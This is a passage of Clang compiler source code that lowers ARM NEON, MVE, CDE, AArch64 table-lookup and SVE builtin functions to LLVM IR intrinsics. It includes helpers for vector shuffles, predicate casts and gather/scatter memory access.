Value *Ld = Builder.CreateCall(F, {Ops[0], Align});
// Combine them.
int Indices[] = {1 - Lane, Lane};
return Builder.CreateShuffleVector(Ops[1], Ld, Indices, "vld1q_lane");
}
LLVM_FALLTHROUGH;
case NEON::BI__builtin_neon_vld1_lane_v: {
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
PtrOp0 = Builder.CreateElementBitCast(PtrOp0, VTy->getElementType());
Value *Ld = Builder.CreateLoad(PtrOp0);
return Builder.CreateInsertElement(Ops[1], Ld, Ops[2], "vld1_lane");
}
case NEON::BI__builtin_neon_vqrshrn_n_v:
Int =
usgn ? Intrinsic::arm_neon_vqrshiftnu : Intrinsic::arm_neon_vqrshiftns;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vqrshrn_n",
1, true);
case NEON::BI__builtin_neon_vqrshrun_n_v:
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_vqrshiftnsu, Ty),
Ops, "vqrshrun_n", 1, true);
case NEON::BI__builtin_neon_vqshrn_n_v:
Int = usgn ? Intrinsic::arm_neon_vqshiftnu : Intrinsic::arm_neon_vqshiftns;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vqshrn_n",
1, true);
case NEON::BI__builtin_neon_vqshrun_n_v:
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_vqshiftnsu, Ty),
Ops, "vqshrun_n", 1, true);
case NEON::BI__builtin_neon_vrecpe_v:
case NEON::BI__builtin_neon_vrecpeq_v:
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_vrecpe, Ty),
Ops, "vrecpe");
case NEON::BI__builtin_neon_vrshrn_n_v:
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_vrshiftn, Ty),
Ops, "vrshrn_n", 1, true);
case NEON::BI__builtin_neon_vrsra_n_v:
case NEON::BI__builtin_neon_vrsraq_n_v:
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Ops[2] = EmitNeonShiftVector(Ops[2], Ty, true);
Int = usgn ? Intrinsic::arm_neon_vrshiftu : Intrinsic::arm_neon_vrshifts;
Ops[1] = Builder.CreateCall(CGM.getIntrinsic(Int, Ty), {Ops[1], Ops[2]});
return Builder.CreateAdd(Ops[0], Ops[1], "vrsra_n");
case NEON::BI__builtin_neon_vsri_n_v:
case NEON::BI__builtin_neon_vsriq_n_v:
rightShift = true;
LLVM_FALLTHROUGH;
case NEON::BI__builtin_neon_vsli_n_v:
case NEON::BI__builtin_neon_vsliq_n_v:
Ops[2] = EmitNeonShiftVector(Ops[2], Ty, rightShift);
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_vshiftins, Ty),
Ops, "vsli_n");
case NEON::BI__builtin_neon_vsra_n_v:
case NEON::BI__builtin_neon_vsraq_n_v:
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
Ops[1] = EmitNeonRShiftImm(Ops[1], Ops[2], Ty, usgn, "vsra_n");
return Builder.CreateAdd(Ops[0], Ops[1]);
case NEON::BI__builtin_neon_vst1q_lane_v:
// Handle 64-bit integer elements as a special case. Use a shuffle to get
// a one-element vector and avoid poor code for i64 in the backend.
if (VTy->getElementType()->isIntegerTy(64)) {
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Value *SV = llvm::ConstantVector::get(cast<llvm::Constant>(Ops[2]));
Ops[1] = Builder.CreateShuffleVector(Ops[1], Ops[1], SV);
Ops[2] = getAlignmentValue32(PtrOp0);
llvm::Type *Tys[] = {Int8PtrTy, Ops[1]->getType()};
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::arm_neon_vst1,
Tys), Ops);
}
LLVM_FALLTHROUGH;
case NEON::BI__builtin_neon_vst1_lane_v: {
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Ops[1] = Builder.CreateExtractElement(Ops[1], Ops[2]);
Ty = llvm::PointerType::getUnqual(Ops[1]->getType());
auto St = Builder.CreateStore(Ops[1], Builder.CreateBitCast(PtrOp0, Ty));
return St;
}
case NEON::BI__builtin_neon_vtbl1_v:
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_vtbl1),
Ops, "vtbl1");
case NEON::BI__builtin_neon_vtbl2_v:
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_vtbl2),
Ops, "vtbl2");
case NEON::BI__builtin_neon_vtbl3_v:
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_vtbl3),
Ops, "vtbl3");
case NEON::BI__builtin_neon_vtbl4_v:
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_vtbl4),
Ops, "vtbl4");
case NEON::BI__builtin_neon_vtbx1_v:
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_vtbx1),
Ops, "vtbx1");
case NEON::BI__builtin_neon_vtbx2_v:
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_vtbx2),
Ops, "vtbx2");
case NEON::BI__builtin_neon_vtbx3_v:
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_vtbx3),
Ops, "vtbx3");
case NEON::BI__builtin_neon_vtbx4_v:
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_vtbx4),
Ops, "vtbx4");
}
}
template<typename Integer>
static Integer GetIntegerConstantValue(const Expr *E, ASTContext &Context) {
return E->getIntegerConstantExpr(Context)->getExtValue();
}
static llvm::Value *SignOrZeroExtend(CGBuilderTy &Builder, llvm::Value *V,
llvm::Type *T, bool Unsigned) {
// Helper function called by Tablegen-constructed ARM MVE builtin codegen,
// which finds it convenient to specify signed/unsigned as a boolean flag.
return Unsigned ? Builder.CreateZExt(V, T) : Builder.CreateSExt(V, T);
}
static llvm::Value *MVEImmediateShr(CGBuilderTy &Builder, llvm::Value *V,
uint32_t Shift, bool Unsigned) {
// MVE helper function for integer shift right. This must handle signed vs
// unsigned, and also deal specially with the case where the shift count is
// equal to the lane size. In LLVM IR, an LShr with that parameter would be
// undefined behavior, but in MVE it's legal, so we must convert it to code
// that is not undefined in IR.
unsigned LaneBits = cast<llvm::VectorType>(V->getType())
->getElementType()
->getPrimitiveSizeInBits();
if (Shift == LaneBits) {
// An unsigned shift of the full lane size always generates zero, so we can
// simply emit a zero vector. A signed shift of the full lane size does the
// same thing as shifting by one bit fewer.
if (Unsigned)
return llvm::Constant::getNullValue(V->getType());
else
--Shift;
}
return Unsigned ? Builder.CreateLShr(V, Shift) : Builder.CreateAShr(V, Shift);
}
static llvm::Value *ARMMVEVectorSplat(CGBuilderTy &Builder, llvm::Value *V) {
// MVE-specific helper function for a vector splat, which infers the element
// count of the output vector by knowing that MVE vectors are all 128 bits
// wide.
unsigned Elements = 128 / V->getType()->getPrimitiveSizeInBits();
return Builder.CreateVectorSplat(Elements, V);
}
static llvm::Value *ARMMVEVectorReinterpret(CGBuilderTy &Builder,
CodeGenFunction *CGF,
llvm::Value *V,
llvm::Type *DestType) {
// Convert one MVE vector type into another by reinterpreting its in-register
// format.
//
// Little-endian, this is identical to a bitcast (which reinterprets the
// memory format). But big-endian, they're not necessarily the same, because
// the register and memory formats map to each other differently depending on
// the lane size.
//
// We generate a bitcast whenever we can (if we're little-endian, or if the
// lane sizes are the same anyway). Otherwise we fall back to an IR intrinsic
// that performs the different kind of reinterpretation.
if (CGF->getTarget().isBigEndian() &&
V->getType()->getScalarSizeInBits() != DestType->getScalarSizeInBits()) {
return Builder.CreateCall(
CGF->CGM.getIntrinsic(Intrinsic::arm_mve_vreinterpretq,
{DestType, V->getType()}),
V);
} else {
return Builder.CreateBitCast(V, DestType);
}
}
static llvm::Value *VectorUnzip(CGBuilderTy &Builder, llvm::Value *V, bool Odd) {
// Make a shufflevector that extracts every other element of a vector (evens
// or odds, as desired).
SmallVector<int, 16> Indices;
unsigned InputElements =
cast<llvm::FixedVectorType>(V->getType())->getNumElements();
for (unsigned i = 0; i < InputElements; i += 2)
Indices.push_back(i + Odd);
return Builder.CreateShuffleVector(V, Indices);
}
static llvm::Value *VectorZip(CGBuilderTy &Builder, llvm::Value *V0,
llvm::Value *V1) {
// Make a shufflevector that interleaves two vectors element by element.
assert(V0->getType() == V1->getType() && "Can't zip different vector types");
SmallVector<int, 16> Indices;
unsigned InputElements =
cast<llvm::FixedVectorType>(V0->getType())->getNumElements();
for (unsigned i = 0; i < InputElements; i++) {
Indices.push_back(i);
Indices.push_back(i + InputElements);
}
return Builder.CreateShuffleVector(V0, V1, Indices);
}
template<unsigned HighBit, unsigned OtherBits>
static llvm::Value *ARMMVEConstantSplat(CGBuilderTy &Builder, llvm::Type *VT) {
// MVE-specific helper function to make a vector splat of a constant such as
// UINT_MAX or INT_MIN, in which all bits below the highest one are equal.
llvm::Type *T = cast<llvm::VectorType>(VT)->getElementType();
unsigned LaneBits = T->getPrimitiveSizeInBits();
uint32_t Value = HighBit << (LaneBits - 1);
if (OtherBits)
Value |= (1UL << (LaneBits - 1)) - 1;
llvm::Value *Lane = llvm::ConstantInt::get(T, Value);
return ARMMVEVectorSplat(Builder, Lane);
}
static llvm::Value *ARMMVEVectorElementReverse(CGBuilderTy &Builder,
llvm::Value *V,
unsigned ReverseWidth) {
// MVE-specific helper function which reverses the elements of a
// vector within every (ReverseWidth)-bit collection of lanes.
SmallVector<int, 16> Indices;
unsigned LaneSize = V->getType()->getScalarSizeInBits();
unsigned Elements = 128 / LaneSize;
unsigned Mask = ReverseWidth / LaneSize - 1;
for (unsigned i = 0; i < Elements; i++)
Indices.push_back(i ^ Mask);
return Builder.CreateShuffleVector(V, Indices);
}
Value *CodeGenFunction::EmitARMMVEBuiltinExpr(unsigned BuiltinID,
const CallExpr *E,
ReturnValueSlot ReturnValue,
llvm::Triple::ArchType Arch) {
enum class CustomCodeGen { VLD24, VST24 } CustomCodeGenType;
Intrinsic::ID IRIntr;
unsigned NumVectors;
// Code autogenerated by Tablegen will handle all the simple builtins.
switch (BuiltinID) {
#include "clang/Basic/arm_mve_builtin_cg.inc"
// If we didn't match an MVE builtin id at all, go back to the
// main EmitARMBuiltinExpr.
default:
return nullptr;
}
// Anything that breaks from that switch is an MVE builtin that
// needs handwritten code to generate.
switch (CustomCodeGenType) {
case CustomCodeGen::VLD24: {
llvm::SmallVector<Value *, 4> Ops;
llvm::SmallVector<llvm::Type *, 4> Tys;
auto MvecCType = E->getType();
auto MvecLType = ConvertType(MvecCType);
assert(MvecLType->isStructTy() &&
"Return type for vld[24]q should be a struct");
assert(MvecLType->getStructNumElements() == 1 &&
"Return-type struct for vld[24]q should have one element");
auto MvecLTypeInner = MvecLType->getStructElementType(0);
assert(MvecLTypeInner->isArrayTy() &&
"Return-type struct for vld[24]q should contain an array");
assert(MvecLTypeInner->getArrayNumElements() == NumVectors &&
"Array member of return-type struct vld[24]q has wrong length");
auto VecLType = MvecLTypeInner->getArrayElementType();
Tys.push_back(VecLType);
auto Addr = E->getArg(0);
Ops.push_back(EmitScalarExpr(Addr));
Tys.push_back(ConvertType(Addr->getType()));
Function *F = CGM.getIntrinsic(IRIntr, makeArrayRef(Tys));
Value *LoadResult = Builder.CreateCall(F, Ops);
Value *MvecOut = UndefValue::get(MvecLType);
for (unsigned i = 0; i < NumVectors; ++i) {
Value *Vec = Builder.CreateExtractValue(LoadResult, i);
MvecOut = Builder.CreateInsertValue(MvecOut, Vec, {0, i});
}
if (ReturnValue.isNull())
return MvecOut;
else
return Builder.CreateStore(MvecOut, ReturnValue.getValue());
}
case CustomCodeGen::VST24: {
llvm::SmallVector<Value *, 4> Ops;
llvm::SmallVector<llvm::Type *, 4> Tys;
auto Addr = E->getArg(0);
Ops.push_back(EmitScalarExpr(Addr));
Tys.push_back(ConvertType(Addr->getType()));
auto MvecCType = E->getArg(1)->getType();
auto MvecLType = ConvertType(MvecCType);
assert(MvecLType->isStructTy() && "Data type for vst2q should be a struct");
assert(MvecLType->getStructNumElements() == 1 &&
"Data-type struct for vst2q should have one element");
auto MvecLTypeInner = MvecLType->getStructElementType(0);
assert(MvecLTypeInner->isArrayTy() &&
"Data-type struct for vst2q should contain an array");
assert(MvecLTypeInner->getArrayNumElements() == NumVectors &&
"Array member of return-type struct vld[24]q has wrong length");
auto VecLType = MvecLTypeInner->getArrayElementType();
Tys.push_back(VecLType);
AggValueSlot MvecSlot = CreateAggTemp(MvecCType);
EmitAggExpr(E->getArg(1), MvecSlot);
auto Mvec = Builder.CreateLoad(MvecSlot.getAddress());
for (unsigned i = 0; i < NumVectors; i++)
Ops.push_back(Builder.CreateExtractValue(Mvec, {0, i}));
Function *F = CGM.getIntrinsic(IRIntr, makeArrayRef(Tys));
Value *ToReturn = nullptr;
for (unsigned i = 0; i < NumVectors; i++) {
Ops.push_back(llvm::ConstantInt::get(Int32Ty, i));
ToReturn = Builder.CreateCall(F, Ops);
Ops.pop_back();
}
return ToReturn;
}
}
llvm_unreachable("unknown custom codegen type.");
}
Value *CodeGenFunction::EmitARMCDEBuiltinExpr(unsigned BuiltinID,
const CallExpr *E,
ReturnValueSlot ReturnValue,
llvm::Triple::ArchType Arch) {
switch (BuiltinID) {
default:
return nullptr;
#include "clang/Basic/arm_cde_builtin_cg.inc"
}
}
static Value *EmitAArch64TblBuiltinExpr(CodeGenFunction &CGF, unsigned BuiltinID,
const CallExpr *E,
SmallVectorImpl<Value *> &Ops,
llvm::Triple::ArchType Arch) {
unsigned int Int = 0;
const char *s = nullptr;
switch (BuiltinID) {
default:
return nullptr;
case NEON::BI__builtin_neon_vtbl1_v:
case NEON::BI__builtin_neon_vqtbl1_v:
case NEON::BI__builtin_neon_vqtbl1q_v:
case NEON::BI__builtin_neon_vtbl2_v:
case NEON::BI__builtin_neon_vqtbl2_v:
case NEON::BI__builtin_neon_vqtbl2q_v:
case NEON::BI__builtin_neon_vtbl3_v:
case NEON::BI__builtin_neon_vqtbl3_v:
case NEON::BI__builtin_neon_vqtbl3q_v:
case NEON::BI__builtin_neon_vtbl4_v:
case NEON::BI__builtin_neon_vqtbl4_v:
case NEON::BI__builtin_neon_vqtbl4q_v:
break;
case NEON::BI__builtin_neon_vtbx1_v:
case NEON::BI__builtin_neon_vqtbx1_v:
case NEON::BI__builtin_neon_vqtbx1q_v:
case NEON::BI__builtin_neon_vtbx2_v:
case NEON::BI__builtin_neon_vqtbx2_v:
case NEON::BI__builtin_neon_vqtbx2q_v:
case NEON::BI__builtin_neon_vtbx3_v:
case NEON::BI__builtin_neon_vqtbx3_v:
case NEON::BI__builtin_neon_vqtbx3q_v:
case NEON::BI__builtin_neon_vtbx4_v:
case NEON::BI__builtin_neon_vqtbx4_v:
case NEON::BI__builtin_neon_vqtbx4q_v:
break;
}
assert(E->getNumArgs() >= 3);
// Get the last argument, which specifies the vector type.
const Expr *Arg = E->getArg(E->getNumArgs() - 1);
Optional<llvm::APSInt> Result = Arg->getIntegerConstantExpr(CGF.getContext());
if (!Result)
return nullptr;
// Determine the type of this overloaded NEON intrinsic.
NeonTypeFlags Type = Result->getZExtValue();
llvm::FixedVectorType *Ty = GetNeonType(&CGF, Type);
if (!Ty)
return nullptr;
CodeGen::CGBuilderTy &Builder = CGF.Builder;
// AArch64 scalar builtins are not overloaded, they do not have an extra
// argument that specifies the vector type, need to handle each case.
switch (BuiltinID) {
case NEON::BI__builtin_neon_vtbl1_v: {
return packTBLDVectorList(CGF, makeArrayRef(Ops).slice(0, 1), nullptr,
Ops[1], Ty, Intrinsic::aarch64_neon_tbl1,
"vtbl1");
}
case NEON::BI__builtin_neon_vtbl2_v: {
return packTBLDVectorList(CGF, makeArrayRef(Ops).slice(0, 2), nullptr,
Ops[2], Ty, Intrinsic::aarch64_neon_tbl1,
"vtbl1");
}
case NEON::BI__builtin_neon_vtbl3_v: {
return packTBLDVectorList(CGF, makeArrayRef(Ops).slice(0, 3), nullptr,
Ops[3], Ty, Intrinsic::aarch64_neon_tbl2,
"vtbl2");
}
case NEON::BI__builtin_neon_vtbl4_v: {
return packTBLDVectorList(CGF, makeArrayRef(Ops).slice(0, 4), nullptr,
Ops[4], Ty, Intrinsic::aarch64_neon_tbl2,
"vtbl2");
}
case NEON::BI__builtin_neon_vtbx1_v: {
Value *TblRes =
packTBLDVectorList(CGF, makeArrayRef(Ops).slice(1, 1), nullptr, Ops[2],
Ty, Intrinsic::aarch64_neon_tbl1, "vtbl1");
llvm::Constant *EightV = ConstantInt::get(Ty, 8);
Value *CmpRes = Builder.CreateICmp(ICmpInst::ICMP_UGE, Ops[2], EightV);
CmpRes = Builder.CreateSExt(CmpRes, Ty);
Value *EltsFromInput = Builder.CreateAnd(CmpRes, Ops[0]);
Value *EltsFromTbl = Builder.CreateAnd(Builder.CreateNot(CmpRes), TblRes);
return Builder.CreateOr(EltsFromInput, EltsFromTbl, "vtbx");
}
case NEON::BI__builtin_neon_vtbx2_v: {
return packTBLDVectorList(CGF, makeArrayRef(Ops).slice(1, 2), Ops[0],
Ops[3], Ty, Intrinsic::aarch64_neon_tbx1,
"vtbx1");
}
case NEON::BI__builtin_neon_vtbx3_v: {
Value *TblRes =
packTBLDVectorList(CGF, makeArrayRef(Ops).slice(1, 3), nullptr, Ops[4],
Ty, Intrinsic::aarch64_neon_tbl2, "vtbl2");
llvm::Constant *TwentyFourV = ConstantInt::get(Ty, 24);
Value *CmpRes = Builder.CreateICmp(ICmpInst::ICMP_UGE, Ops[4],
TwentyFourV);
CmpRes = Builder.CreateSExt(CmpRes, Ty);
Value *EltsFromInput = Builder.CreateAnd(CmpRes, Ops[0]);
Value *EltsFromTbl = Builder.CreateAnd(Builder.CreateNot(CmpRes), TblRes);
return Builder.CreateOr(EltsFromInput, EltsFromTbl, "vtbx");
}
case NEON::BI__builtin_neon_vtbx4_v: {
return packTBLDVectorList(CGF, makeArrayRef(Ops).slice(1, 4), Ops[0],
Ops[5], Ty, Intrinsic::aarch64_neon_tbx2,
"vtbx2");
}
case NEON::BI__builtin_neon_vqtbl1_v:
case NEON::BI__builtin_neon_vqtbl1q_v:
Int = Intrinsic::aarch64_neon_tbl1; s = "vtbl1"; break;
case NEON::BI__builtin_neon_vqtbl2_v:
case NEON::BI__builtin_neon_vqtbl2q_v: {
Int = Intrinsic::aarch64_neon_tbl2; s = "vtbl2"; break;
case NEON::BI__builtin_neon_vqtbl3_v:
case NEON::BI__builtin_neon_vqtbl3q_v:
Int = Intrinsic::aarch64_neon_tbl3; s = "vtbl3"; break;
case NEON::BI__builtin_neon_vqtbl4_v:
case NEON::BI__builtin_neon_vqtbl4q_v:
Int = Intrinsic::aarch64_neon_tbl4; s = "vtbl4"; break;
case NEON::BI__builtin_neon_vqtbx1_v:
case NEON::BI__builtin_neon_vqtbx1q_v:
Int = Intrinsic::aarch64_neon_tbx1; s = "vtbx1"; break;
case NEON::BI__builtin_neon_vqtbx2_v:
case NEON::BI__builtin_neon_vqtbx2q_v:
Int = Intrinsic::aarch64_neon_tbx2; s = "vtbx2"; break;
case NEON::BI__builtin_neon_vqtbx3_v:
case NEON::BI__builtin_neon_vqtbx3q_v:
Int = Intrinsic::aarch64_neon_tbx3; s = "vtbx3"; break;
case NEON::BI__builtin_neon_vqtbx4_v:
case NEON::BI__builtin_neon_vqtbx4q_v:
Int = Intrinsic::aarch64_neon_tbx4; s = "vtbx4"; break;
}
}
if (!Int)
return nullptr;
Function *F = CGF.CGM.getIntrinsic(Int, Ty);
return CGF.EmitNeonCall(F, Ops, s);
}
Value *CodeGenFunction::vectorWrapScalar16(Value *Op) {
auto *VTy = llvm::FixedVectorType::get(Int16Ty, 4);
Op = Builder.CreateBitCast(Op, Int16Ty);
Value *V = UndefValue::get(VTy);
llvm::Constant *CI = ConstantInt::get(SizeTy, 0);
Op = Builder.CreateInsertElement(V, Op, CI);
return Op;
}
/// SVEBuiltinMemEltTy - Returns the memory element type for this memory
/// access builtin. Only required if it can't be inferred from the base pointer
/// operand.
llvm::Type *CodeGenFunction::SVEBuiltinMemEltTy(const SVETypeFlags &TypeFlags) {
switch (TypeFlags.getMemEltType()) {
case SVETypeFlags::MemEltTyDefault:
return getEltType(TypeFlags);
case SVETypeFlags::MemEltTyInt8:
return Builder.getInt8Ty();
case SVETypeFlags::MemEltTyInt16:
return Builder.getInt16Ty();
case SVETypeFlags::MemEltTyInt32:
return Builder.getInt32Ty();
case SVETypeFlags::MemEltTyInt64:
return Builder.getInt64Ty();
}
llvm_unreachable("Unknown MemEltType");
}
llvm::Type *CodeGenFunction::getEltType(const SVETypeFlags &TypeFlags) {
switch (TypeFlags.getEltType()) {
default:
llvm_unreachable("Invalid SVETypeFlag!");
case SVETypeFlags::EltTyInt8:
return Builder.getInt8Ty();
case SVETypeFlags::EltTyInt16:
return Builder.getInt16Ty();
case SVETypeFlags::EltTyInt32:
return Builder.getInt32Ty();
case SVETypeFlags::EltTyInt64:
return Builder.getInt64Ty();
case SVETypeFlags::EltTyFloat16:
return Builder.getHalfTy();
case SVETypeFlags::EltTyFloat32:
return Builder.getFloatTy();
case SVETypeFlags::EltTyFloat64:
return Builder.getDoubleTy();
case SVETypeFlags::EltTyBFloat16:
return Builder.getBFloatTy();
case SVETypeFlags::EltTyBool8:
case SVETypeFlags::EltTyBool16:
case SVETypeFlags::EltTyBool32:
case SVETypeFlags::EltTyBool64:
return Builder.getInt1Ty();
}
}
// Return the llvm predicate vector type corresponding to the specified element
// TypeFlags.
llvm::ScalableVectorType *
CodeGenFunction::getSVEPredType(const SVETypeFlags &TypeFlags) {
switch (TypeFlags.getEltType()) {
default: llvm_unreachable("Unhandled SVETypeFlag!");
case SVETypeFlags::EltTyInt8:
return llvm::ScalableVectorType::get(Builder.getInt1Ty(), 16);
case SVETypeFlags::EltTyInt16:
return llvm::ScalableVectorType::get(Builder.getInt1Ty(), 8);
case SVETypeFlags::EltTyInt32:
return llvm::ScalableVectorType::get(Builder.getInt1Ty(), 4);
case SVETypeFlags::EltTyInt64:
return llvm::ScalableVectorType::get(Builder.getInt1Ty(), 2);
case SVETypeFlags::EltTyBFloat16:
return llvm::ScalableVectorType::get(Builder.getInt1Ty(), 8);
case SVETypeFlags::EltTyFloat16:
return llvm::ScalableVectorType::get(Builder.getInt1Ty(), 8);
case SVETypeFlags::EltTyFloat32:
return llvm::ScalableVectorType::get(Builder.getInt1Ty(), 4);
case SVETypeFlags::EltTyFloat64:
return llvm::ScalableVectorType::get(Builder.getInt1Ty(), 2);
case SVETypeFlags::EltTyBool8:
return llvm::ScalableVectorType::get(Builder.getInt1Ty(), 16);
case SVETypeFlags::EltTyBool16:
return llvm::ScalableVectorType::get(Builder.getInt1Ty(), 8);
case SVETypeFlags::EltTyBool32:
return llvm::ScalableVectorType::get(Builder.getInt1Ty(), 4);
case SVETypeFlags::EltTyBool64:
return llvm::ScalableVectorType::get(Builder.getInt1Ty(), 2);
}
}
// Return the llvm vector type corresponding to the specified element TypeFlags.
llvm::ScalableVectorType *
CodeGenFunction::getSVEType(const SVETypeFlags &TypeFlags) {
switch (TypeFlags.getEltType()) {
default:
llvm_unreachable("Invalid SVETypeFlag!");
case SVETypeFlags::EltTyInt8:
return llvm::ScalableVectorType::get(Builder.getInt8Ty(), 16);
case SVETypeFlags::EltTyInt16:
return llvm::ScalableVectorType::get(Builder.getInt16Ty(), 8);
case SVETypeFlags::EltTyInt32:
return llvm::ScalableVectorType::get(Builder.getInt32Ty(), 4);
case SVETypeFlags::EltTyInt64:
return llvm::ScalableVectorType::get(Builder.getInt64Ty(), 2);
case SVETypeFlags::EltTyFloat16:
return llvm::ScalableVectorType::get(Builder.getHalfTy(), 8);
case SVETypeFlags::EltTyBFloat16:
return llvm::ScalableVectorType::get(Builder.getBFloatTy(), 8);
case SVETypeFlags::EltTyFloat32:
return llvm::ScalableVectorType::get(Builder.getFloatTy(), 4);
case SVETypeFlags::EltTyFloat64:
return llvm::ScalableVectorType::get(Builder.getDoubleTy(), 2);
case SVETypeFlags::EltTyBool8:
return llvm::ScalableVectorType::get(Builder.getInt1Ty(), 16);
case SVETypeFlags::EltTyBool16:
return llvm::ScalableVectorType::get(Builder.getInt1Ty(), 8);
case SVETypeFlags::EltTyBool32:
return llvm::ScalableVectorType::get(Builder.getInt1Ty(), 4);
case SVETypeFlags::EltTyBool64:
return llvm::ScalableVectorType::get(Builder.getInt1Ty(), 2);
}
}
llvm::Value *
CodeGenFunction::EmitSVEAllTruePred(const SVETypeFlags &TypeFlags) {
Function *Ptrue =
CGM.getIntrinsic(Intrinsic::aarch64_sve_ptrue, getSVEPredType(TypeFlags));
return Builder.CreateCall(Ptrue, {Builder.getInt32(/*SV_ALL*/ 31)});
}
constexpr unsigned SVEBitsPerBlock = 128;
static llvm::ScalableVectorType *getSVEVectorForElementType(llvm::Type *EltTy) {
unsigned NumElts = SVEBitsPerBlock / EltTy->getScalarSizeInBits();
return llvm::ScalableVectorType::get(EltTy, NumElts);
}
// Reinterpret the input predicate so that it can be used to correctly isolate
// the elements of the specified datatype.
Value *CodeGenFunction::EmitSVEPredicateCast(Value *Pred,
llvm::ScalableVectorType *VTy) {
auto *RTy = llvm::VectorType::get(IntegerType::get(getLLVMContext(), 1), VTy);
if (Pred->getType() == RTy)
return Pred;
unsigned IntID;
llvm::Type *IntrinsicTy;
switch (VTy->getMinNumElements()) {
default:
llvm_unreachable("unsupported element count!");
case 2:
case 4:
case 8:
IntID = Intrinsic::aarch64_sve_convert_from_svbool;
IntrinsicTy = RTy;
break;
case 16:
IntID = Intrinsic::aarch64_sve_convert_to_svbool;
IntrinsicTy = Pred->getType();
break;
}
Function *F = CGM.getIntrinsic(IntID, IntrinsicTy);
Value *C = Builder.CreateCall(F, Pred);
assert(C->getType() == RTy && "Unexpected return type!");
return C;
}
Value *CodeGenFunction::EmitSVEGatherLoad(const SVETypeFlags &TypeFlags,
SmallVectorImpl<Value *> &Ops,
unsigned IntID) {
auto *ResultTy = getSVEType(TypeFlags);
auto *OverloadedTy =
llvm::ScalableVectorType::get(SVEBuiltinMemEltTy(TypeFlags), ResultTy);
// At the ACLE level there's only one predicate type, svbool_t, which is
// mapped to <n x 16 x i1>. However, this might be incompatible with the
// actual type being loaded. For example, when loading doubles (i64) the
// predicated should be <n x 2 x i1> instead. At the IR level the type of
// the predicate and the data being loaded must match. Cast accordingly.
Ops[0] = EmitSVEPredicateCast(Ops[0], OverloadedTy);
Function *F = nullptr;
if (Ops[1]->getType()->isVectorTy())
// This is the "vector base, scalar offset" case. In order to uniquely
// map this built-in to an LLVM IR intrinsic, we need both the return type
// and the type of the vector base.
F = CGM.getIntrinsic(IntID, {OverloadedTy, Ops[1]->getType()});
else
// This is the "scalar base, vector offset case". The type of the offset
// is encoded in the name of the intrinsic. We only need to specify the
// return type in order to uniquely map this built-in to an LLVM IR
// intrinsic.
F = CGM.getIntrinsic(IntID, OverloadedTy);
// Pass 0 when the offset is missing. This can only be applied when using
// the "vector base" addressing mode for which ACLE allows no offset. The
// corresponding LLVM IR always requires an offset.
if (Ops.size() == 2) {
assert(Ops[1]->getType()->isVectorTy() && "Scalar base requires an offset");
Ops.push_back(ConstantInt::get(Int64Ty, 0));
}
// For "vector base, scalar index" scale the index so that it becomes a
// scalar offset.
if (!TypeFlags.isByteIndexed() && Ops[1]->getType()->isVectorTy()) {
unsigned BytesPerElt =
OverloadedTy->getElementType()->getScalarSizeInBits() / 8;
Value *Scale = ConstantInt::get(Int64Ty, BytesPerElt);
Ops[2] = Builder.CreateMul(Ops[2], Scale);
}
Value *Call = Builder.CreateCall(F, Ops);
// The following sext/zext is only needed when ResultTy != OverloadedTy. In
// other cases it's folded into a nop.
return TypeFlags.isZExtReturn() ? Builder.CreateZExt(Call, ResultTy)
: Builder.CreateSExt(Call, ResultTy);
}
Value *CodeGenFunction::EmitSVEScatterStore(const SVETypeFlags &TypeFlags,
SmallVectorImpl<Value *> &Ops,
unsigned IntID) {
auto *SrcDataTy = getSVEType(TypeFlags);
auto *OverloadedTy =
llvm::ScalableVectorType::get(SVEBuiltinMemEltTy(TypeFlags), SrcDataTy);
// In ACLE the source data is passed in the last argument, whereas in LLVM IR
// it's the first argument. Move it accordingly.
Ops.insert(Ops.begin(), Ops.pop_back_val());
Function *F = nullptr;
if (Ops[2]->getType()->isVectorTy())
// This is the "vector base, scalar offset" case. In order to uniquely
// map this built-in to an LLVM IR intrinsic, we need both the return type
// and the type of the vector base.
F = CGM.getIntrinsic(IntID, {OverloadedTy, Ops[2]->getType()});
else
// This is the "scalar base, vector offset case". The type of the offset
// is encoded in the name of the intrinsic. We only need to specify the
// return type in order to uniquely map this built-in to an LLVM IR
// intrinsic.
F = CGM.getIntrinsic(IntID, OverloadedTy);
// Pass 0 when the offset is missing. This can only be applied when using
// the "vector base" addressing mode for which ACLE allows no offset. The
// corresponding LLVM IR always requires an offset.
if (Ops.size() == 3) {
assert(Ops[1]->getType()->isVectorTy() && "Scalar base requires an offset");
Ops.push_back(ConstantInt::get(Int64Ty, 0));
}
// Truncation is needed when SrcDataTy != OverloadedTy. In other cases it's
// folded into a nop.
Ops[0] = Builder.CreateTrunc(Ops[0], OverloadedTy);
// At the ACLE level there's only one predicate type, svbool_t, which is
// mapped to <n x 16 x i1>. However, this might be incompatible with the
// actual type being stored. For example, when storing doubles (i64) the
// predicated should be <n x 2 x i1> instead. At the IR level the type of
// the predicate and the data being stored must match. Cast accordingly.
Ops[1] = EmitSVEPredicateCast(Ops[1], OverloadedTy);
// For "vector base, scalar index" scale the index so that it becomes a
// scalar offset.
if (!TypeFlags.isByteIndexed() && Ops[2]->getType()->isVectorTy()) {
unsigned BytesPerElt =
OverloadedTy->getElementType()->getScalarSizeInBits() / 8;
Value *Scale = ConstantInt::get(Int64Ty, BytesPerElt);
